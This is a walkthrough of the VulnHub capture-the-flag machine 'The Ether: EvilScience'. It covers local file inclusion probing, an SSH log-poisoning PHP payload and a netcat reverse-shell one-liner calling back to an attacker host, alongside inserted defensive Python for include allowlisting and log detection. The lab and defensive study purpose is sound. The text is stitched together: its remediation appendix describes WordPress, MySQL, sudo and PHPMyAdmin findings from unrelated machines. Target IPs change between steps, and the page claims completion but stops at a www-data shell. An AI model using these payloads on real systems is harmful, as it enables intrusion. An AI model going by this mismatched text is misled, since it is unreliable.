Difference between revisions of "The Ether: EvilScience (v1.0.1) - Walkthrough"
Revision as of 21:43, 10 May 2018
Objective
The goal is to find out what The Ether is up to. You will be required to break into their server, root the machine, and retrieve the flag. The flag will contain more information about The Ether’s ominous operations regarding this medicine.
Source: [VulnHub.com]
Status: [Completed]
Methodology
Discovery
root@kali:# Nmap 7.60 scan initiated Tue Apr 24 07:34:52 2018 as: nmap -O -p- -sT -sV -T5 -o nmap.txt 192.168.56.101
Nmap scan report for 192.168.56.101
Host is up (0.0012s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:36:82:0F (Oracle VirtualBox virtual NIC)
Entry Point #1 - Port 80 (HTTP)
Enumeration
Nothing interesting turned up in the nikto scan.
Nothing interesting turned up after running dirb with the directory-list-1.0.txt wordlist.
Checking out the website source revealed an LFI opportunity, so let's focus on that for now.
Exploitation
Assessing whether the file include functionality expects specific files or is open to path modification:
root@kali:# curl -s http://192.168.56.102/?file=research.php |grep "What was the Human Genome"
<h4>What was the Human Genome Project?</h4>
<h4>What was the Human Genome Project?</h4>
root@kali:# curl -s http://192.168.56.102/?file=../public_html/research.php |grep "What was the Human Genome"
<h4>What was the Human Genome Project?</h4>
<h4>What was the Human Genome Project?</h4>
Path traversal works, so at least the app does not perform any sort of check for specific file names. But does it work for any file?
root@kali:# curl -s http://192.168.56.102/?file=/etc/passwd |grep root
Nope :(
How about something other than /etc?
root@kali:# curl -v -s -G --data-urlencode file=/sbin/ifconfig -o lfi.txt http://192.168.56.102
root@kali:# strings lfi.txt |grep ifconfig
ifconfig [-a] [-v] [-s] <interface> [[<AF>] <address>]
ifconfig: option `%s' not recognised.
ifconfig: `--help' gives usage information.
ifconfig: Error resolving '%s' for broadcast
ifconfig: Error resolving '%s' for dstaddr
How about the logs area?
root@kali:# curl -v -s -G --data-urlencode file=/var/log/lastlog -o lfi.txt http://192.168.56.102
root@kali:# strings lfi.txt |head -5
Ztty1
Ztty1
root@kali:# curl -v -s -G --data-urlencode file=/var/log/auth.log http://192.168.56.102 |less
May 4 06:48:09 theEther sshd[1939]: pam_unix(sshd:auth): check pass; user unknown
May 4 06:48:10 theEther sshd[1939]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.200
May 4 06:48:11 theEther sshd[1939]: Failed password for invalid user
Perfect! We can include /var/log/auth.log (which, by the way, reflects my failed ssh logins).
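The probes above show what the vulnerable include accepts: a relative page name, a traversal path that lands back on the same file, a binary under /sbin and a log under /var/log. The following Python is an added example (not the theEther application's code, which is PHP and is not shown on this page) of the server-side resolution the file parameter should have gone through instead: an allowlist of page names, no directory components from user input, and a realpath confinement check so a symlinked page cannot escape the web root. The web root is taken from the walkthrough's pwd output; the allowlist contents and the probe list are assumptions built from the pages and paths seen on this page.

```python
import os
import posixpath
import tempfile

# Web root as reported by `pwd` once the shell landed (from the walkthrough).
WEB_ROOT = "/var/www/html/theEther.com/public_html"
# Hypothetical allowlist: the pages the walkthrough's `ls` showed in the web root.
ALLOWED_PAGES = frozenset({"index.php", "about.php", "research.php"})


class IncludeRejected(ValueError):
    """Raised when a requested include does not pass the allowlist."""


def resolve_include(requested, web_root=WEB_ROOT, allowed=ALLOWED_PAGES):
    """Return the absolute path to include, or raise IncludeRejected.

    The vulnerable app included ../public_html/research.php, /sbin/ifconfig and
    /var/log/auth.log; every one of those is rejected here.
    """
    if not requested or "\x00" in requested:
        raise IncludeRejected("empty name or embedded NUL byte")
    # Any directory component ("..", "/", absolute path) is rejected outright:
    # user input may pick a page name, never a directory.
    if requested != posixpath.basename(requested):
        raise IncludeRejected("path separators or traversal in %r" % requested)
    if requested not in allowed:
        raise IncludeRejected("%r is not an allowlisted page" % requested)
    full = posixpath.join(web_root, requested)
    # Defence in depth: when the web root exists on disk, canonicalise both
    # sides so a symlinked page cannot resolve outside the root.
    if os.path.isdir(web_root):
        real_root = os.path.realpath(web_root)
        real_full = os.path.realpath(full)
        if os.path.commonpath([real_root, real_full]) != real_root:
            raise IncludeRejected("%r resolves outside the web root" % requested)
    return full


def triage(candidates, **kw):
    """Run each candidate through resolve_include and collect the verdicts."""
    verdicts = {}
    for name in candidates:
        try:
            verdicts[name] = "ok: " + resolve_include(name, **kw)
        except IncludeRejected as exc:
            verdicts[name] = "rejected: " + str(exc)
    return verdicts


def symlink_escape_is_blocked():
    """Self-check on a throwaway web root (constructed for this example):
    a page that is a symlink to a file outside the root must be rejected,
    while a regular allowlisted page still resolves."""
    parent = tempfile.mkdtemp()
    root = os.path.join(parent, "public_html")
    os.mkdir(root)
    open(os.path.join(parent, "secret.txt"), "w").close()
    open(os.path.join(root, "about.php"), "w").close()
    os.symlink(os.path.join(parent, "secret.txt"), os.path.join(root, "research.php"))
    try:
        resolve_include("research.php", web_root=root)
        return False
    except IncludeRejected:
        return resolve_include("about.php", web_root=root) == os.path.join(root, "about.php")


# Constructed inputs: the exact `file=` values probed in the walkthrough,
# plus a NUL-byte truncation attempt.
PROBES = [
    "research.php",
    "../public_html/research.php",
    "/etc/passwd",
    "/sbin/ifconfig",
    "/var/log/auth.log",
    "research.php\x00.txt",
]

if __name__ == "__main__":
    for name, verdict in triage(PROBES).items():
        print(repr(name), "->", verdict)
    print("symlink escape blocked:", symlink_escape_is_blocked())
```

The allowlist is what actually closes the hole; the realpath check only matters once an attacker can place or rename files inside the web root, which is exactly the situation this walkthrough ends in.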
Time for the good old SSH log poisoning technique.
A word of caution - you can inject many fun commands via a <? system(..) ?> call, but beware that one mishap will render your auth.log unusable (think broken PHP). While this is easily fixed in your lab environment - just revert your VM to the last snapshot - in a real-world pentesting scenario you'll lose a valuable point of entry!
ssh '<?php system($_GET['cmd']); ?>'@192.168.56.106
'<?php system($_GET['cmd']); ?>'@192.168.56.106's password:
<Ctrl>-C
Now let's try including auth.log again, this time passing an arbitrary command to it:
# curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode cmd="ls -altr /var/tmp" http://192.168.56.106 |less
....
drwxr-xr-x 23 root root 4.0K Nov 22 19:28 ..
drwxrwxrwt 2 root root 4.0K May 4 05:01 VMwareDnD
drwxrwxrwt 2 root root 4.0K May 4 05:01 .font-unix
drwxrwxrwt 2 root root 4.0K May 4 05:01 .XIM-unix
drwxrwxrwt 2 root root 4.0K May 4 05:01 .X11-unix
drwxrwxrwt 2 root root 4.0K May 4 05:01 .Test-unix
drwxrwxrwt 2 root root 4.0K May 4 05:01 .ICE-unix
drwx------ 3 root root 4.0K May 4 05:01 systemd-private-3d5770dbd5104a3c9698f04d0c7e41c3-systemd-timesyncd.service-hu1BO3
drwxrwxrwt 9 root root 4.0K May 4 14:39 .
....
Ok! Time for the real deal - let's get a reverse shell up and running!
Window #1:
root@kali:# nc -lt -p 4444
Window #2:
root@kali:# curl -v -s -G --data-urlencode file=/var/log/auth.log --data-urlencode cmd="rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1|nc 192.168.56.200 4444 >/tmp/backpipe" http://192.168.56.106
Window #1: You should now get a shell
root@kali:# nc -lt -p 4444
/bin/sh: 0: can't access tty; job control turned off
$
$ ls
about.php
images
index.php
layout
licence.txt
research.php
xxxlogauditorxxx.py
$ pwd
/var/www/html/theEther.com/public_html
$ hostname
theEther
$ clear
TERM environment variable not set.
$ whoami
www-data
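Every step of the chain above leaves a trace in two logs the target already keeps: the poisoned username lands in auth.log, and the LFI probes, the cmd parameter and the reverse-shell one-liner all land in the Apache access log. The following Python is an added detection example, not something from the walkthrough or the VulnHub image: it scans constructed sshd lines (modelled on the auth.log excerpt above, with a poisoned "Invalid user" entry) and constructed Apache combined-format lines (modelled on the curl requests above) and reports which rule each one trips. The log line formats, the parameter names file and cmd, and the token list are assumptions for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# PHP code has no business inside an SSH username field.
PHP_MARKERS = re.compile(
    r"<\?(?:php|=)?|\$_(?:GET|POST|REQUEST|COOKIE)\b"
    r"|\b(?:system|passthru|shell_exec|exec|eval)\s*\(",
    re.IGNORECASE,
)
SSHD_LINE = re.compile(r"^(?P<ts>\w{3}\s+\d+ [\d:]+) (?P<host>\S+) sshd\[\d+\]: (?P<msg>.*)$")
APACHE_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Include targets that turn an LFI into code execution (assumed list).
LOG_PATHS = ("/var/log/", "/proc/self/")
# Tokens that mark a cmd= value as a shell/reverse-shell payload (assumed list).
SHELL_TOKENS = re.compile(r"\b(?:nc|ncat|mkfifo|bash|sh|python|perl|wget|curl)\b|/bin/sh|/dev/tcp")


def _finding(source, line, rule, detail, src=None):
    return {"source": source, "line": line, "rule": rule, "detail": detail, "src": src}


def scan_auth_log(lines):
    """Flag sshd entries whose message carries PHP markers (log poisoning)."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = SSHD_LINE.match(line)
        if m and PHP_MARKERS.search(m.group("msg")):
            findings.append(_finding("auth.log", n, "php-in-ssh-username", m.group("msg")))
    return findings


def scan_access_log(lines):
    """Flag file= values that leave the web root and cmd= values riding along."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = APACHE_LINE.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)  # percent-decodes values
        files = query.get("file", [])
        cmds = query.get("cmd", [])
        for value in files:
            if value.startswith(LOG_PATHS):
                rule = "lfi-log-include"
            elif value.startswith("/") or ".." in value.split("/"):
                rule = "lfi-traversal-or-absolute"
            else:
                continue  # plain page name, nothing to report
            findings.append(_finding("access.log", n, rule, value, m.group("src")))
        if files and cmds:
            hot = any(SHELL_TOKENS.search(c) for c in cmds)
            rule = "lfi-with-cmd-reverse-shell" if hot else "lfi-with-cmd"
            findings.append(_finding("access.log", n, rule, "; ".join(cmds), m.group("src")))
    return findings


# Constructed sample: the walkthrough's auth.log excerpt plus one poisoned entry.
AUTH_LOG = [
    "May  4 06:48:09 theEther sshd[1939]: pam_unix(sshd:auth): check pass; user unknown",
    "May  4 06:48:10 theEther sshd[1939]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.200",
    "May  4 06:48:11 theEther sshd[1939]: Failed password for invalid user guest from 192.168.56.200 port 50112 ssh2",
    "May  4 06:50:02 theEther sshd[1957]: Invalid user <?php system($_GET['cmd']); ?> from 192.168.56.200",
]

# Constructed sample: what the curl requests above look like in Apache's combined log.
ACCESS_LOG = [
    '192.168.56.200 - - [04/May/2018:06:40:01 +0000] "GET /?file=research.php HTTP/1.1" 200 5120 "-" "curl/7.58.0"',
    '192.168.56.200 - - [04/May/2018:06:41:15 +0000] "GET /?file=../public_html/research.php HTTP/1.1" 200 5120 "-" "curl/7.58.0"',
    '192.168.56.200 - - [04/May/2018:06:45:30 +0000] "GET /?file=%2Fetc%2Fpasswd HTTP/1.1" 200 311 "-" "curl/7.58.0"',
    '192.168.56.200 - - [04/May/2018:06:51:07 +0000] "GET /?file=%2Fvar%2Flog%2Fauth.log&cmd=ls%20-altr%20%2Fvar%2Ftmp HTTP/1.1" 200 20480 "-" "curl/7.58.0"',
    '192.168.56.200 - - [04/May/2018:06:55:44 +0000] "GET /?file=%2Fvar%2Flog%2Fauth.log&cmd=rm%20-f%20%2Ftmp%2Fbackpipe%3B%20mkfifo%20%2Ftmp%2Fbackpipe%3B%20cat%20%2Ftmp%2Fbackpipe%20%7C%20%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.56.200%204444%20%3E%2Ftmp%2Fbackpipe HTTP/1.1" 200 0 "-" "curl/7.58.0"',
]

if __name__ == "__main__":
    for f in scan_auth_log(AUTH_LOG) + scan_access_log(ACCESS_LOG):
        print("%-10s line %d  %-28s %s" % (f["source"], f["line"], f["rule"], f["detail"]))
```

The poisoned username is the cheapest thing to alert on, because a legitimate login name never contains <? or $_GET; the access-log rules are noisier on their own but become high confidence once a cmd parameter shows up next to a file parameter pointing at a log.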
Appendix A: Vulnerability Detail and Mitigation
Rating | High |
Description | The password for WordPress admin account is the same as username (admin:admin) |
Impact | These types of passwords are very easy to guess |
Remediation | Enforce stronger password policies. A strong password should be at least 8 characters, should not contain any personal information, including user id, it should not contain any words spelled correctly and it should contain numbers, letters, and special characters. |

Rating | High |
Description | User 'unclestinky' was found to reuse the same password between mysql and system logins. |
Impact | Password reuse is a practice which should be highly discouraged and prevented to the extent possible as it potentially allows an increase in attack surface. In this case, the impact is amplified by the fact that an attacker who was able to extract user credentials from mysql database would be able to reuse said credentials to gain access to user's system account. |
Remediation | Policies need to be put in place to enforce the use of unique passwords. The use of password managers should be encouraged to aid users in utilizing unique passwords across various systems. |

Rating | High |
Description | Website contains a number of plug-ins with known vulnerabilities. |
Impact | A combination of unpatched components and weak authentication allows an attacker to upload arbitrary scripts and files to the system which can be then loaded via the website allowing an attacker to execute arbitrary commands to escalate access, exfil data, or otherwise damage the system. |
Remediation | All assets should be kept current with latest patches and updates. This can be achieved with native tools (e.g. built-in auto-update functionality) or third party applications. |

Rating | High |
Description | 'sudo' is improperly configured for 'mrderp' account |
Impact | An attacker who manages to compromise this account will be able to execute arbitrary commands with 'root' access. |
Remediation | Do not allow executing commands as 'root' which are located in user home directory or any location where these can be modified by a non-root user. |

Rating | Low |
Description | PHPMyAdmin was discovered at the default install path |
Impact | Using default path/locations makes it easier for attackers to locate components |
Remediation | Use non-standard naming convention where possible. |
If you have any questions feel free to hit me up on twitter @blaksec